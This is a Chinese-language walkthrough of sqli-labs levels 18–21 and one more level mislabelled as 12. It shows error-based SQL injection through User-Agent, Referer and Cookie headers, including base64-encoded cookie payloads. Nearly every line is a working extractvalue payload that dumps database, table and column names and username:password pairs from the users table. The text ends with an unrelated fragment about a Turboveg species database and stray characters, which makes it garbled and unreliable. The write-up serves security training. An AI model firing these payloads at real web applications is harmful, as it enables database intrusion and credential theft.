18、第十八关
经过测试发现User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0'加引号报错
这里我们闭合一下试试
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0','127.0.0.1','admin')#果然不报错了,猜测是单引号的闭合那就尝试用报错注入
爆库111' or extractvalue(1,concat(0x7e,database(),0x7e)) or '
爆表名:1','1',extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e)))#
爆字段:1','1',extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e)))#
爆账号密码:1','1',extractvalue(1,concat(0x7e,(select group_concat(username,':',password) from users),0x7e)))#
extractvalue爆出来的长度有限
19、第十九关
根据提示referer,经过尝试发现Referer: http://sqli.labs/Less-19/'单引号报错
Referer: http://sqli.labs/Less-19/','1')#单引号加参数加括号闭合
这种还是报错注入,接下来尝试
爆库:1',extractvalue(1,concat(0x7e,database(),0x7e)))#
爆表:1',extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e)))#
爆字段:1',extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e)))#
爆账号密码:1',extractvalue(1,concat(0x7e,(select group_concat(username,':',password) from users),0x7e)))#这个报错长度有限,想要爆出全部,加where条件
20、第二十关
输入账号密码登录进去是这样的
抓包看下,尝试一圈发现cookie加单引号报错Cookie: uname=admin'
尝试闭合Cookie: uname=admin'--+,看来是单引号闭合
那就直接上extractvalue(1,1)报错注入
爆库:admin' and extractvalue(1,concat(0x7e,database(),0x7e))--+
爆表:admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))--+
爆字段:admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e))--+
爆账号密码:admin' and extractvalue(1,concat(0x7e,(select group_concat(username,':',password) from users where id<3),0x7e))--+这个报错长度有限,可以加where条件爆出所有账号
21、第二十一关
登录进去这样
多次尝试未果,后来发现Cookie: uname=YWRtaW4这个cookie应该是加密的,尝试base64解密后是这样Cookie: uname=admin把admin'加密后果然报错
Cookie: uname=YWRtaW4n单引号闭合
那接下来就简单了,步骤和前几关差不多,只是参数用base64加密一下admin')#"尝试出单引号加括号闭合
爆库:base64编码后的payload:YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSkj
爆表:YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknKSwweDdlKSkj
爆字段:YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnIGFuZCB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JyksMHg3ZSkpIw==
爆账号密码:YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUsJzonLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSwweDdlKSkj
12、第十二关
登录后这样
和上一关类似,尝试后发现这关是双引号闭合admin"#base64加密注入会报错
和上一关类似,base64编码后的payload
爆库:YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpKSM=
爆表:YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScpLDB4N2UpKSM=
爆字段:YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSd1c2VycycgYW5kIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknKSwweDdlKSkj
爆账号密码:YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSwnOicscGFzc3dvcmQpIGZyb20gdXNlcnMpLDB4N2UpKSM=
:从Turboveg数据库导入物种列表)
)
)
)
 1925C)
